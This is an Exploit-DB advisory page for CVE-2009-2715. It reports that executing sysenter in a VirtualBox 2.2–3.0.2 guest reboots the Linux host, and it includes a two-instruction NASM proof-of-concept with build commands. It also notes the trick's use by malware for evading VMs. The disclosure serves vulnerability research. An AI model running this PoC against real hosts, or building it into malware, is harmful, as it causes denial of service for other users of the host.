Sun xVM VirtualBox 2.2 < 3.0.2 r49928 - Local Host Reboot (Denial of Service) (PoC)

EDB-ID:

9323

CVE:

2009-2715

EDB Verified:

Author:

Tadas Vilkeliskis

Type:

dos

Exploit:   /  

Platform:

Multiple

Date:

2009-08-01

Vulnerable App: 
Sun's VirtualBox host reboot PoC
by Tadas Vilkeliskis <vilkeliskis.t@gmail.com>
Disclosure made at 2009-08-01

VULNERABILITY INFORMATION

Remotely exploitable: no
Locally exploitable: yes
Affected versions: 2.2 - 3.0.2 r49928 for Linux

VULNERABILITY DESCRIPTION

VirtualBox VM is unable to handle fast call to privilege level 0 system
procedures (sysenter). If sysenter instruction is executed on the guest
OS the host machine will reboot. The technique was tested on the
following guest OS: Windows XP, Windows 7 RC, Ubuntu 9.04. It is not
clear whether it is possible to execute arbitrary code on the host,
however this trick can be successfully used by malware as an anti-vm
trick.

POC

; nasm -f elf vmhostreboot.asm
; gcc vmhostreboot.o -o vmhostreboot

BITS 32
SECTION .text
GLOBAL main

main:
    sysenter
    ret

# milw0rm.com [2009-08-01]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services